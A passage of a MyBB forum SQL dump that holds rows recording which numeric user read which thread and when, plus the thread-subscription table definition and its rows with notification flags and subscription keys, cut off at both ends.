VALUES('766', '5', '1352521610'); INSERT INTO mybb_threadsread VALUES('1236', '205', '1352633600'); INSERT INTO mybb_threadsread VALUES('1235', '205', '1352521947'); INSERT INTO mybb_threadsread VALUES('1237', '5', '1352521857'); INSERT INTO mybb_threadsread VALUES('1236', '5', '1352521969'); INSERT INTO mybb_threadsread VALUES('1215', '5', '1352522083'); INSERT INTO mybb_threadsread VALUES('1169', '5', '1352523105'); INSERT INTO mybb_threadsread VALUES('1238', '5', '1352523437'); INSERT INTO mybb_threadsread VALUES('1239', '5', '1352524747'); INSERT INTO mybb_threadsread VALUES('1240', '1', '1352524893'); INSERT INTO mybb_threadsread VALUES('1241', '1', '1352663010'); INSERT INTO mybb_threadsread VALUES('1239', '1', '1352525366'); INSERT INTO mybb_threadsread VALUES('1213', '8', '1352525480'); INSERT INTO mybb_threadsread VALUES('1242', '9', '1352525739'); INSERT INTO mybb_threadsread VALUES('1040', '9', '1352525940'); INSERT INTO mybb_threadsread VALUES('812', '9', '1352526033'); INSERT INTO mybb_threadsread VALUES('1239', '258', '1352526524'); INSERT INTO mybb_threadsread VALUES('1232', '258', '1352552067'); INSERT INTO mybb_threadsread VALUES('1220', '258', '1352526737'); INSERT INTO mybb_threadsread VALUES('1233', '258', '1352526579'); INSERT INTO mybb_threadsread VALUES('1211', '9', '1352526830'); INSERT INTO mybb_threadsread VALUES('1211', '1', '1352526851'); INSERT INTO mybb_threadsread VALUES('1243', '8', '1352527015'); INSERT INTO mybb_threadsread VALUES('587', '4', '1352527100'); INSERT INTO mybb_threadsread VALUES('587', '8', '1352527110'); INSERT INTO mybb_threadsread VALUES('1050', '4', '1352527203'); INSERT INTO mybb_threadsread VALUES('1225', '8', '1352527905'); INSERT INTO mybb_threadsread VALUES('1050', '1', '1352607677'); INSERT INTO mybb_threadsread VALUES('1244', '5', '1352528647'); INSERT INTO mybb_threadsread VALUES('405', '5', '1352528837'); INSERT INTO mybb_threadsread VALUES('426', '1', '1352571057'); INSERT INTO mybb_threadsread VALUES('1245', '1', '1352596626'); INSERT INTO mybb_threadsread VALUES('1171', '1', '1352603898'); INSERT INTO mybb_threadsread VALUES('1171', '4', '1352597632'); INSERT INTO mybb_threadsread VALUES('426', '5', '1352530414'); INSERT INTO mybb_threadsread VALUES('96', '5', '1352530425'); INSERT INTO mybb_threadsread VALUES('1167', '5', '1352530472'); INSERT INTO mybb_threadsread VALUES('1032', '5', '1352530491'); INSERT INTO mybb_threadsread VALUES('800', '5', '1352530932'); INSERT INTO mybb_threadsread VALUES('1189', '5', '1352530951'); INSERT INTO mybb_threadsread VALUES('1199', '5', '1352531012'); INSERT INTO mybb_threadsread VALUES('1209', '1', '1352534038'); INSERT INTO mybb_threadsread VALUES('1244', '53', '1352534397'); INSERT INTO mybb_threadsread VALUES('1236', '53', '1352662341'); INSERT INTO mybb_threadsread VALUES('1169', '53', '1352624822'); INSERT INTO mybb_threadsread VALUES('1246', '1', '1352570881'); INSERT INTO mybb_threadsread VALUES('1169', '7', '1352536053'); INSERT INTO mybb_threadsread VALUES('212', '1', '1352536256'); INSERT INTO mybb_threadsread VALUES('431', '1', '1352536266'); INSERT INTO mybb_threadsread VALUES('439', '1', '1352536349'); INSERT INTO mybb_threadsread VALUES('1148', '53', '1352536435'); INSERT INTO mybb_threadsread VALUES('1239', '53', '1352536447'); INSERT INTO mybb_threadsread VALUES('398', '53', '1352626526'); INSERT INTO mybb_threadsread VALUES('1246', '53', '1352561649'); INSERT INTO mybb_threadsread VALUES('1232', '257', '1352558036'); INSERT INTO mybb_threadsread VALUES('487', '53', '1352537002'); INSERT INTO mybb_threadsread VALUES('1235', '53', '1352625408'); INSERT INTO mybb_threadsread VALUES('1229', '257', '1352537928'); INSERT INTO mybb_threadsread VALUES('20', '1', '1352611309'); INSERT INTO mybb_threadsread VALUES('1227', '4', '1352542082'); INSERT INTO mybb_threadsread VALUES('1220', '4', '1352542136'); INSERT INTO mybb_threadsread VALUES('465', '4', '1352571859'); INSERT INTO mybb_threadsread VALUES('238', '258', '1352547037'); INSERT INTO mybb_threadsread VALUES('1235', '258', '1352547068'); INSERT INTO mybb_threadsread VALUES('1246', '257', '1352594980'); INSERT INTO mybb_threadsread VALUES('465', '257', '1352547870'); INSERT INTO mybb_threadsread VALUES('1245', '257', '1352550689'); INSERT INTO mybb_threadsread VALUES('238', '228', '1352558312'); INSERT INTO mybb_threadsread VALUES('1245', '62', '1352550221'); INSERT INTO mybb_threadsread VALUES('1235', '228', '1352550242'); INSERT INTO mybb_threadsread VALUES('1246', '228', '1352558327'); INSERT INTO mybb_threadsread VALUES('1040', '62', '1352550890'); INSERT INTO mybb_threadsread VALUES('1232', '228', '1352550378'); INSERT INTO mybb_threadsread VALUES('1242', '228', '1352550456'); INSERT INTO mybb_threadsread VALUES('1245', '228', '1352580102'); INSERT INTO mybb_threadsread VALUES('1237', '82', '1352597444'); INSERT INTO mybb_threadsread VALUES('1236', '82', '1352662182'); INSERT INTO mybb_threadsread VALUES('1213', '82', '1352597360'); INSERT INTO mybb_threadsread VALUES('812', '82', '1352550682'); INSERT INTO mybb_threadsread VALUES('426', '82', '1352551193'); INSERT INTO mybb_threadsread VALUES('1171', '82', '1352598257'); INSERT INTO mybb_threadsread VALUES('1209', '82', '1352550707'); INSERT INTO mybb_threadsread VALUES('1246', '82', '1352551575'); INSERT INTO mybb_threadsread VALUES('1245', '82', '1352550779'); INSERT INTO mybb_threadsread VALUES('1242', '82', '1352551639'); INSERT INTO mybb_threadsread VALUES('1239', '228', '1352550736'); INSERT INTO mybb_threadsread VALUES('812', '228', '1352550750'); INSERT INTO mybb_threadsread VALUES('792', '82', '1352589176'); INSERT INTO mybb_threadsread VALUES('315', '82', '1352589181'); INSERT INTO mybb_threadsread VALUES('812', '62', '1352550902'); INSERT INTO mybb_threadsread VALUES('1234', '62', '1352551007'); INSERT INTO mybb_threadsread VALUES('1242', '257', '1352553521'); INSERT INTO mybb_threadsread VALUES('766', '53', '1352553576'); INSERT INTO mybb_threadsread VALUES('98', '53', '1352554499'); INSERT INTO mybb_threadsread VALUES('180', '53', '1352554560'); INSERT INTO mybb_threadsread VALUES('450', '53', '1352554561'); INSERT INTO mybb_threadsread VALUES('971', '341', '1352555192'); INSERT INTO mybb_threadsread VALUES('1232', '341', '1352555448'); INSERT INTO mybb_threadsread VALUES('1208', '341', '1352555438'); INSERT INTO mybb_threadsread VALUES('959', '341', '1352555517'); INSERT INTO mybb_threadsread VALUES('1147', '341', '1352555587'); INSERT INTO mybb_threadsread VALUES('1098', '341', '1352555606'); INSERT INTO mybb_threadsread VALUES('922', '341', '1352555719'); INSERT INTO mybb_threadsread VALUES('957', '341', '1352555731'); INSERT INTO mybb_threadsread VALUES('1208', '257', '1352557579'); INSERT INTO mybb_threadsread VALUES('1236', '228', '1352665799'); INSERT INTO mybb_threadsread VALUES('1236', '257', '1352558545'); INSERT INTO mybb_threadsread VALUES('426', '228', '1352558350'); INSERT INTO mybb_threadsread VALUES('465', '53', '1352561922'); INSERT INTO mybb_threadsread VALUES('1171', '53', '1352561956'); INSERT INTO mybb_threadsread VALUES('1050', '82', '1352562105'); INSERT INTO mybb_threadsread VALUES('1236', '1', '1352662730'); INSERT INTO mybb_threadsread VALUES('1220', '342', '1352571758'); INSERT INTO mybb_threadsread VALUES('465', '1', '1352571884'); INSERT INTO mybb_threadsread VALUES('1247', '342', '1352658913'); INSERT INTO mybb_threadsread VALUES('1222', '4', '1352571989'); INSERT INTO mybb_threadsread VALUES('19', '342', '1352571960'); INSERT INTO mybb_threadsread VALUES('1099', '342', '1352571974'); INSERT INTO mybb_threadsread VALUES('1047', '342', '1352658946'); INSERT INTO mybb_threadsread VALUES('991', '4', '1352572120'); INSERT INTO mybb_threadsread VALUES('1247', '61', '1352580833'); INSERT INTO mybb_threadsread VALUES('1247', '53', '1352575333'); INSERT INTO mybb_threadsread VALUES('1144', '53', '1352625357'); INSERT INTO mybb_threadsread VALUES('592', '53', '1352575408'); INSERT INTO mybb_threadsread VALUES('1241', '61', '1352591051'); INSERT INTO mybb_threadsread VALUES('1118', '1', '1352662322'); INSERT INTO mybb_threadsread VALUES('1247', '1', '1352664448'); INSERT INTO mybb_threadsread VALUES('1240', '61', '1352577397'); INSERT INTO mybb_threadsread VALUES('1248', '1', '1352664323'); INSERT INTO mybb_threadsread VALUES('1248', '61', '1352583619'); INSERT INTO mybb_threadsread VALUES('1144', '82', '1352647909'); INSERT INTO mybb_threadsread VALUES('1248', '82', '1352662110'); INSERT INTO mybb_threadsread VALUES('1247', '82', '1352647920'); INSERT INTO mybb_threadsread VALUES('1249', '82', '1352597485'); INSERT INTO mybb_threadsread VALUES('1248', '228', '1352580220'); INSERT INTO mybb_threadsread VALUES('1241', '228', '1352583811'); INSERT INTO mybb_threadsread VALUES('1249', '228', '1352642065'); INSERT INTO mybb_threadsread VALUES('1118', '228', '1352665871'); INSERT INTO mybb_threadsread VALUES('1249', '1', '1352580597'); INSERT INTO mybb_threadsread VALUES('1241', '82', '1352597361'); INSERT INTO mybb_threadsread VALUES('1050', '228', '1352583761'); INSERT INTO mybb_threadsread VALUES('1144', '228', '1352583861'); INSERT INTO mybb_threadsread VALUES('1246', '61', '1352587433'); INSERT INTO mybb_threadsread VALUES('1241', '62', '1352587545'); INSERT INTO mybb_threadsread VALUES('1249', '62', '1352587616'); INSERT INTO mybb_threadsread VALUES('991', '62', '1352587627'); INSERT INTO mybb_threadsread VALUES('1213', '62', '1352587717'); INSERT INTO mybb_threadsread VALUES('1237', '62', '1352646739'); INSERT INTO mybb_threadsread VALUES('792', '62', '1352646726'); INSERT INTO mybb_threadsread VALUES('315', '62', '1352588387'); INSERT INTO mybb_threadsread VALUES('1250', '62', '1352620736'); INSERT INTO mybb_threadsread VALUES('1250', '82', '1352589058'); INSERT INTO mybb_threadsread VALUES('1237', '1', '1352589787'); INSERT INTO mybb_threadsread VALUES('79', '1', '1352589705'); INSERT INTO mybb_threadsread VALUES('398', '61', '1352591150'); INSERT INTO mybb_threadsread VALUES('535', '1', '1352592339'); INSERT INTO mybb_threadsread VALUES('1144', '61', '1352597467'); INSERT INTO mybb_threadsread VALUES('1170', '4', '1352597601'); INSERT INTO mybb_threadsread VALUES('1248', '4', '1352597677'); INSERT INTO mybb_threadsread VALUES('1236', '4', '1352597705'); INSERT INTO mybb_threadsread VALUES('1144', '4', '1352597812'); INSERT INTO mybb_threadsread VALUES('1170', '82', '1352604417'); INSERT INTO mybb_threadsread VALUES('1251', '82', '1352604416'); INSERT INTO mybb_threadsread VALUES('1252', '82', '1352650143'); INSERT INTO mybb_threadsread VALUES('1252', '1', '1352661258'); INSERT INTO mybb_threadsread VALUES('1236', '61', '1352599246'); INSERT INTO mybb_threadsread VALUES('861', '61', '1352599256'); INSERT INTO mybb_threadsread VALUES('991', '61', '1352601493'); INSERT INTO mybb_threadsread VALUES('1081', '82', '1352602714'); INSERT INTO mybb_threadsread VALUES('1251', '1', '1352603862'); INSERT INTO mybb_threadsread VALUES('1081', '1', '1352603417'); INSERT INTO mybb_threadsread VALUES('1170', '1', '1352603955'); INSERT INTO mybb_threadsread VALUES('563', '343', '1352609076'); INSERT INTO mybb_threadsread VALUES('1225', '343', '1352609935'); INSERT INTO mybb_threadsread VALUES('1122', '343', '1352609942'); INSERT INTO mybb_threadsread VALUES('335', '343', '1352609966'); INSERT INTO mybb_threadsread VALUES('1170', '257', '1352617562'); INSERT INTO mybb_threadsread VALUES('1251', '257', '1352617664'); INSERT INTO mybb_threadsread VALUES('1252', '257', '1352618019'); INSERT INTO mybb_threadsread VALUES('1235', '262', '1352619731'); INSERT INTO mybb_threadsread VALUES('1144', '262', '1352619751'); INSERT INTO mybb_threadsread VALUES('1234', '262', '1352619799'); INSERT INTO mybb_threadsread VALUES('1236', '262', '1352619851'); INSERT INTO mybb_threadsread VALUES('1248', '62', '1352620791'); INSERT INTO mybb_threadsread VALUES('1248', '53', '1352634225'); INSERT INTO mybb_threadsread VALUES('1235', '333', '1352625017'); INSERT INTO mybb_threadsread VALUES('1243', '53', '1352625388'); INSERT INTO mybb_threadsread VALUES('1248', '205', '1352633870'); INSERT INTO mybb_threadsread VALUES('1253', '205', '1352634280'); INSERT INTO mybb_threadsread VALUES('1254', '205', '1352634722'); INSERT INTO mybb_threadsread VALUES('1253', '53', '1352663074'); INSERT INTO mybb_threadsread VALUES('1234', '205', '1352635342'); INSERT INTO mybb_threadsread VALUES('1253', '228', '1352655344'); INSERT INTO mybb_threadsread VALUES('1237', '228', '1352642109'); INSERT INTO mybb_threadsread VALUES('418', '228', '1352642172'); INSERT INTO mybb_threadsread VALUES('1254', '228', '1352642230'); INSERT INTO mybb_threadsread VALUES('1247', '228', '1352642294'); INSERT INTO mybb_threadsread VALUES('1066', '228', '1352642360'); INSERT INTO mybb_threadsread VALUES('1234', '53', '1352645334'); INSERT INTO mybb_threadsread VALUES('1254', '258', '1352645469'); INSERT INTO mybb_threadsread VALUES('1253', '62', '1352646430'); INSERT INTO mybb_threadsread VALUES('1253', '82', '1352661899'); INSERT INTO mybb_threadsread VALUES('1252', '228', '1352650294'); INSERT INTO mybb_threadsread VALUES('1170', '228', '1352648588'); INSERT INTO mybb_threadsread VALUES('1040', '228', '1352648876'); INSERT INTO mybb_threadsread VALUES('1252', '53', '1352649996'); INSERT INTO mybb_threadsread VALUES('1173', '61', '1352649954'); INSERT INTO mybb_threadsread VALUES('1209', '228', '1352653393'); INSERT INTO mybb_threadsread VALUES('1255', '345', '1352656175'); INSERT INTO mybb_threadsread VALUES('1118', '345', '1352655431'); INSERT INTO mybb_threadsread VALUES('238', '345', '1352655118'); INSERT INTO mybb_threadsread VALUES('249', '345', '1352655211'); INSERT INTO mybb_threadsread VALUES('1255', '228', '1352665823'); INSERT INTO mybb_threadsread VALUES('1253', '345', '1352656174'); INSERT INTO mybb_threadsread VALUES('1252', '345', '1352656392'); INSERT INTO mybb_threadsread VALUES('1156', '228', '1352657664'); INSERT INTO mybb_threadsread VALUES('1062', '228', '1352657674'); INSERT INTO mybb_threadsread VALUES('1140', '53', '1352660913'); INSERT INTO mybb_threadsread VALUES('1255', '82', '1352662019'); INSERT INTO mybb_threadsread VALUES('1255', '1', '1352662960'); INSERT INTO mybb_threadsread VALUES('1253', '1', '1352662506'); INSERT INTO mybb_threadsread VALUES('1245', '53', '1352662536'); INSERT INTO mybb_threadsread VALUES('124', '1', '1352662546'); INSERT INTO mybb_threadsread VALUES('281', '53', '1352662553'); INSERT INTO mybb_threadsread VALUES('1201', '1', '1352662786'); INSERT INTO mybb_threadsread VALUES('135', '1', '1352663994'); INSERT INTO mybb_threadsread VALUES('1242', '1', '1352665288'); INSERT INTO mybb_threadsread VALUES('1253', '257', '1352679999'); INSERT INTO mybb_threadsread VALUES('1118', '61', '1352738376'); DROP TABLE IF EXISTS mybb_threadsubscriptions; CREATE TABLE mybb_threadsubscriptions ( sid int(10) unsigned NOT NULL auto_increment, uid int(10) unsigned NOT NULL, tid int(10) unsigned NOT NULL, notification int(1) NOT NULL, dateline bigint(30) NOT NULL, subscriptionkey varchar(32) NOT NULL, PRIMARY KEY (sid), KEY uid (uid), KEY tid (tid,notification) ); INSERT INTO mybb_threadsubscriptions VALUES('1', '13', '44', '1', '1342146175', 'ed14a522a8d0192f108f2d860f24480e'); INSERT INTO mybb_threadsubscriptions VALUES('2', '44', '74', '1', '1344830641', 'c8793f75cb1631d9e900551f31f2f8b2'); INSERT INTO mybb_threadsubscriptions VALUES('3', '44', '54', '1', '1344831216', 'd1c39e4e66ca661a7e596de6f07b8acb'); INSERT INTO mybb_threadsubscriptions VALUES('4', '48', '105', '0', '1344965203', '45a8a03e76cda8cda6ddb50d45442e3a'); INSERT INTO mybb_threadsubscriptions VALUES('5', '48', '48', '0', '1344988840', '44c4853d875ef9095ec900ca8e2eed64'); INSERT INTO mybb_threadsubscriptions VALUES('6', '82', '161', '1', '1345520270', '07fc0a5e6497c90c1e611fce6f97b474'); INSERT INTO mybb_threadsubscriptions VALUES('7', '82', '152', '1', '1345520696', 'd7fe3d32b37582aa7f99d58d5a6c1e70'); INSERT INTO mybb_threadsubscriptions VALUES('8', '82', '167', '1', '1345522131', '6e49bf1285c7a9969dcd02089e5b0ed6'); INSERT INTO mybb_threadsubscriptions VALUES('36', '82', '174', '1', '1345595734', '1863201bbabd992e5dfd2663a596b5fc'); INSERT INTO mybb_threadsubscriptions VALUES('10', '82', '166', '1', '1345554230', '964087317687b64dfbdc6729f16126f2'); INSERT INTO mybb_threadsubscriptions VALUES('11', '82', '43', '1', '1345554314', 'f5545f7d7039701a3f75b98de987df1c'); INSERT INTO mybb_threadsubscriptions VALUES('12', '82', '31', '1', '1345554500', 'f4ff63249044f2027533bffb8311f1e0'); INSERT INTO mybb_threadsubscriptions VALUES('13', '82', '59', '1', '1345554867', '78e41f175aa6ba6e0f6eb6fd9451e866'); INSERT INTO mybb_threadsubscriptions VALUES('14', '82', '158', '1', '1345555006', '2ae0a2c54b01cdd3a63bd3815d34f4e4'); INSERT INTO mybb_threadsubscriptions VALUES('15', '82', '91', '1', '1345555125', '345d6d67f14661b037d1ec202ddf915f'); INSERT INTO mybb_threadsubscriptions VALUES('16', '82', '134', '1', '1345555390', '4952798ffabd352a990274ab9ca61f6d'); INSERT INTO mybb_threadsubscriptions VALUES('17', '82', '171', '1', '1345555795', '07cd536c877a9b9adc76be51408116ea'); INSERT INTO mybb_threadsubscriptions VALUES('18', '82', '112', '1', '1345555945', 'e13376f10cefd05e019cc8d1aeae6209'); INSERT INTO mybb_threadsubscriptions VALUES('19', '82', '141', '1', '1345556144', 'a4990d850c55b3c9968c8247d2cc2c71'); INSERT INTO mybb_threadsubscriptions VALUES('20', '82', '160', '1', '1345556275', 'a6ededffd5d4ab1fe5818adebdbd8688'); INSERT INTO mybb_threadsubscriptions VALUES('21', '82', '139', '1', '1345556489', 'e541661d7c25571bd72586215d065ad1'); INSERT INTO mybb_threadsubscriptions VALUES('22', '82', '74', '1', '1345556678', '8fabe71d8b21ea09ee015d654b2d5d49'); INSERT INTO mybb_threadsubscriptions VALUES('23', '82', '127', '1', '1345556827', '91810c635294430108806a7a83d8d03c'); INSERT INTO mybb_threadsubscriptions VALUES('24', '82', '135', '1', '1345556962', '3fe9a0310b9969733e8b6b2ab3682e74'); INSERT INTO mybb_threadsubscriptions VALUES('25', '82', '164', '1', '1345557147', '1fdfa3d190dbf8ba240d42047762564c'); INSERT INTO mybb_threadsubscriptions VALUES('26', '82', '146', '1', '1345557294', '6c20f7c45d8866b0ea759c908440d98d'); INSERT INTO mybb_threadsubscriptions VALUES('27', '82', '79', '1', '1345557524', 'ac8ec1f83935beaf31b0d2beb0683bdb'); INSERT INTO mybb_threadsubscriptions VALUES('28', '82', '163', '1', '1345557636', 'd2bf6346365f8fe12801c9ac2d5a5c05'); INSERT INTO mybb_threadsubscriptions VALUES('29', '82', '2', '1', '1345557853', 'c4663f80b155157a20ad1ebfcaec52aa'); INSERT INTO mybb_threadsubscriptions VALUES('30', '82', '83', '1', '1345557952', '66cb63a7c47e4de06db924c23c31131c'); INSERT INTO mybb_threadsubscriptions VALUES('31', '82', '138', '1', '1345558150', '12bb2aeffa1aa41785e6c17879f6e719'); INSERT INTO mybb_threadsubscriptions VALUES('32', '82', '162', '1', '1345559185', '289b84567a39a3ed14c454893dd70e36'); INSERT INTO mybb_threadsubscriptions VALUES('33', '82', '104', '1', '1345559836', '75d1e7329869781b8e6bb6829d8a1368'); INSERT INTO mybb_threadsubscriptions VALUES('34', '82', '16', '1', '1345560022', 'e3d69948b2b57ab45fb3a67d902d2e33'); INSERT INTO mybb_threadsubscriptions VALUES('35', '82', '51', '1', '1345560297', '719758174868d4fe7df24d9a68c331f5'); INSERT INTO mybb_threadsubscriptions VALUES('37', '82', '175', '1', '1345595912', 'c431c24b0150508807bc6cdadf016425'); INSERT INTO mybb_threadsubscriptions VALUES('38', '82', '182', '1', '1345647134', '7365e664cb84f34030b5cb54662987bd'); INSERT INTO mybb_threadsubscriptions VALUES('39', '82', '185', '1', '1345689206', '6e3a873d989299a8fb9b3e31c42aea2e'); INSERT INTO mybb_threadsubscriptions VALUES('40', '82', '189', '1', '1345730037', '7dcabb72b1719cc4169848cf458de22c'); INSERT INTO mybb_threadsubscriptions VALUES('41', '82', '179', '1', '1345730342', '089fa11759a5b39ab2319e399f5b84ea'); INSERT INTO mybb_threadsubscriptions VALUES('42', '82', '187', '1', '1345730390', 'beb512dc4fb6ef3407d382fadffe8564'); INSERT INTO mybb_threadsubscriptions VALUES('43', '82', '184', '1', '1345730483', 'cef8adfcae75014fa027eae5f890a9f3'); INSERT INTO mybb_threadsubscriptions VALUES('44', '82', '192', '1', '1345749254', '88df23b1a057b4168d0d3f7d85825306'); INSERT INTO mybb_threadsubscriptions VALUES('45', '82', '190', '1', '1345749300', '9383fa74161aa0fc3d462cfa4377bbb9'); INSERT INTO mybb_threadsubscriptions VALUES('46', '82', '188', '1', '1345749631', 'e9418a247555897b88706b874950d5de'); INSERT INTO mybb_threadsubscriptions VALUES('47', '82', '81', '1', '1345750602', 'c147e590a364d0d0087e41d6f85fb6fa'); INSERT INTO mybb_threadsubscriptions VALUES('48', '82', '94', '1', '1345751596', 'b35839ac5c351fb0e0da6f2306bfb3f4'); INSERT INTO mybb_threadsubscriptions VALUES('49', '82', '39', '1', '1345751702', 'a8f8bc5ad9559e190081256d78310ecd'); INSERT INTO mybb_threadsubscriptions VALUES('50', '82', '26', '1', '1345752102', '68c80e1510dc9fec641db40579a0d508'); INSERT INTO mybb_threadsubscriptions VALUES('51', '82', '193', '1', '1345752929', '9636b66d4df0623f56cd78c5c854e581'); INSERT INTO mybb_threadsubscriptions VALUES('52', '82', '130', '1', '1345753707', '301999ed910ea0bb3abb44fbd5490eb8'); INSERT INTO mybb_threadsubscriptions VALUES('53', '82', '195', '1', '1345759118', '5e1c59f356cee1c0fd4fa14264ebdfc2'); INSERT INTO mybb_threadsubscriptions VALUES('54', '82', '196', '1', '1345766360', '0299b576751bb4f21cdaeee717baa2d3'); INSERT INTO mybb_threadsubscriptions VALUES('55', '82', '197', '1', '1345766578', 'b65bcfaaf599f5d9cc280310208948b0'); INSERT INTO mybb_threadsubscriptions VALUES('56', '82', '200', '1', '1345776608', 'c497c960189ef3ceb8510e15a3691f06'); INSERT INTO mybb_threadsubscriptions VALUES('57', '82', '203', '1', '1345814261', '55e6b87dd8cdecdea162dba13ba4a2b2'); INSERT INTO mybb_threadsubscriptions VALUES('58', '82', '201', '1', '1345814819', 'cce1904b52d2705050e7446f8efc6a8f'); INSERT INTO mybb_threadsubscriptions VALUES('59', '82', '78', '1', '1345820653', '0e76d38a4c9275e9b509209fd9ce0087'); INSERT INTO mybb_threadsubscriptions VALUES('60', '82', '206', '1', '1345824220', 'c161f8b049c054ff0bced99b8e60c652'); INSERT INTO mybb_threadsubscriptions VALUES('61', '82', '207', '1', '1345827486', 'd964b87d731ef4379d474c6e56a7cdfb'); INSERT INTO mybb_threadsubscriptions VALUES('62', '82', '208', '1', '1345836146', '85c57c61965753be3f463f7b426b717a'); INSERT INTO mybb_threadsubscriptions VALUES('63', '82', '209', '1', '1345848449', '22ebfd0f015fab31656640e6362017de'); INSERT INTO mybb_threadsubscriptions VALUES('64', '82', '210', '1', '1345853611', '412b3af74c3a123e07c1b999aedeb0eb'); INSERT INTO mybb_threadsubscriptions VALUES('65', '82', '211', '1', '1345857526', '377cf8bdde8f9f976b7d6238ec064188'); INSERT INTO mybb_threadsubscriptions VALUES('66', '82', '176', '1', '1345867236', '56983d8508c5e7b2297d36db1298069e'); INSERT INTO mybb_threadsubscriptions VALUES('67', '82', '213', '1', '1345867692', '1b4266535c92df48b47b7f1ad9893900'); INSERT INTO mybb_threadsubscriptions VALUES('68', '82', '24', '1', '1345868955', '83b355b02809b918335d2f29c0af2d8c'); INSERT INTO mybb_threadsubscriptions VALUES('69', '82', '218', '1', '1345869611', 'db5b85b6bebe1976759f15770ee361ab'); INSERT INTO mybb_threadsubscriptions VALUES('70', '82', '219', '1', '1345871321', '6a29b7860f211fe8f96be2746af21996'); INSERT INTO mybb_threadsubscriptions VALUES('71', '82', '221', '1', '1345903215', '7f4c538e30dc20a51abcab7e1540f01c'); INSERT INTO mybb_threadsubscriptions VALUES('72', '82', '222', '1', '1345905811', '01dcbd3b49a69d2c5840c3420f495739'); INSERT INTO mybb_threadsubscriptions VALUES('73', '82', '223', '1', '1345906030', '5c5867d80f37e99f5f038caa21610601'); INSERT INTO mybb_threadsubscriptions VALUES('74', '82', '224', '1', '1345906134', '3759e04b4a0515df5616403806e759c3'); INSERT INTO mybb_threadsubscriptions VALUES('96', '48', '113', '0', '1345984968', 'b0161e536590ef534860011a88e47eb5'); INSERT INTO mybb_threadsubscriptions VALUES('76', '48', '130', '0', '1345909041', '3745118c91960f6e27e722177097b2e2'); INSERT INTO mybb_threadsubscriptions VALUES('77', '82', '230', '1', '1345917879', 'b777e456fb72dc5b1e51bac5d6179e35'); INSERT INTO mybb_threadsubscriptions VALUES('78', '82', '212', '1', '1345918349', 'e1174a4c88d7db908b2d27c670493c51'); INSERT INTO mybb_threadsubscriptions VALUES('79', '82', '231', '1', '1345918976', '48b0df5cacb6d3190e1a1c1fab8b0b55'); INSERT INTO mybb_threadsubscriptions VALUES('80', '82', '233', '1', '1345948629', '3dba147e31982a5278f2b3c9b7d8f660'); INSERT INTO mybb_threadsubscriptions VALUES('81', '82', '29', '1', '1345949449', 'fa2201975cc48ceb49cedaa66bf956f0'); INSERT INTO mybb_threadsubscriptions VALUES('82', '82', '226', '1', '1345949816', '54df3c541a70e8a7d1a2b306159836a3'); INSERT INTO mybb_threadsubscriptions VALUES('83', '82', '232', '1', '1345950447', 'a1b96fc86db008070888931d880bce5b'); INSERT INTO mybb_threadsubscriptions VALUES('84', '82', '236', '1', '1345951020', '74ba028343c322c8d64cfdef4da19ed5'); INSERT INTO mybb_threadsubscriptions VALUES('85', '82', '214', '1', '1345951240', 'f6f25b65872bff0b7eab07c363a13f7a'); INSERT INTO mybb_threadsubscriptions VALUES('86', '82', '235', '1', '1345951506', 'c709f63d79cdf997c115ce0b3ad78a65'); INSERT INTO mybb_threadsubscriptions VALUES('87', '82', '237', '1', '1345952107', '4671c7b1dea6e28e744b69c1392e6a5b'); INSERT INTO mybb_threadsubscriptions VALUES('88', '82', '238', '1', '1345953707', '7c7dcc0ff06654c5a556f7eb193f5b9e'); INSERT INTO mybb_threadsubscriptions VALUES('89', '82', '239', '1', '1345954747', '4e4d01939aa075d66ef7e9253b3465ca'); INSERT INTO mybb_threadsubscriptions VALUES('90', '82', '240', '1', '1345957663', 'de1c70649412fa93160f835a1b14af47'); INSERT INTO mybb_threadsubscriptions VALUES('91', '82', '241', '1', '1345958174', 'a9233cbcab92dfd38c6add6f4cd77b44'); INSERT INTO mybb_threadsubscriptions VALUES('92', '82', '242', '1', '1345959364', '627ad717f0eac9d3a73a1ca3ce21c057'); INSERT INTO mybb_threadsubscriptions VALUES('93', '82', '243', '1', '1345959485', 'bfdded03d0f68a26c245d5b6c1b36918'); INSERT INTO mybb_threadsubscriptions VALUES('94', '82', '244', '1', '1345961374', 'e2f43b7c08c983393649b8714895850e'); INSERT INTO mybb_threadsubscriptions VALUES('95', '48', '246', '0', '1345978650', '29a325a3162020899ebc0c86f35e3d76'); INSERT INTO mybb_threadsubscriptions VALUES('98', '82', '247', '1', '1345991171', '125273c9c4977b5ae209c00af2af15db'); INSERT INTO mybb_threadsubscriptions VALUES('99', '82', '248', '1', '1345991325', '9f11f9b7f51f018dadbfe00ad07972b6'); INSERT INTO mybb_threadsubscriptions VALUES('100', '82', '249', '1', '1345991527', 'ff65bcb0076fa73194f41e75a83d9f28'); INSERT INTO mybb_threadsubscriptions VALUES('101', '82', '250', '1', '1345994060', '16090a89fd151effdf2ac6209c069208'); INSERT INTO mybb_threadsubscriptions VALUES('102', '82', '191', '1', '1346079186', 'e46c0b084395c0bfb0a5b2a38c5df582'); INSERT INTO mybb_threadsubscriptions VALUES('103', '82', '253', '1', '1346079894', 'e6a661cb86a09039f583f5977acc93aa'); INSERT INTO mybb_threadsubscriptions VALUES('104', '82', '256', '1', '1346082742', '84630b0294ca9f9fe9521df53b62f5e4'); INSERT INTO mybb_threadsubscriptions VALUES('105', '82', '257', '1', '1346084981', '354d925b8efd8590cf3f9b9e4508d242'); INSERT INTO mybb_threadsubscriptions VALUES('106', '82', '259', '1', '1346093539', '6eeed92fdf92d74c08e69dd711f05bea'); INSERT INTO mybb_threadsubscriptions VALUES('107', '82', '260', '1', '1346095927', '159f19c1b9274fbe928a0c4ad32e714f'); INSERT INTO mybb_threadsubscriptions VALUES('108', '82', '261', '1', '1346096034', 'a4b96191250fdefe476b7855f69b6965'); INSERT INTO mybb_threadsubscriptions VALUES('109', '82', '159', '1', '1346096562', '3dc99809a2d951e87e2401adf0422665'); INSERT INTO mybb_threadsubscriptions VALUES('111', '82', '265', '1', '1346110374', 'ecb6c4d64821d75bff2897eb08c81f34'); INSERT INTO mybb_threadsubscriptions VALUES('112', '82', '266', '1', '1346111714', '08634915011b8a587b3d70754f5fe33e'); INSERT INTO mybb_threadsubscriptions VALUES('113', '82', '267', '1', '1346113934', '2614f9ed96989a6422365e5f0ad3107e'); INSERT INTO mybb_threadsubscriptions VALUES('114', '82', '268', '1', '1346114870', '48bdcb718cb0fb2c03108a3cef4454bf'); INSERT INTO mybb_threadsubscriptions VALUES('115', '82', '269', '1', '1346130233', 'b0c55da911163d6a38b956b869dada2b'); INSERT INTO mybb_threadsubscriptions VALUES('116', '82', '270', '1', '1346160715', 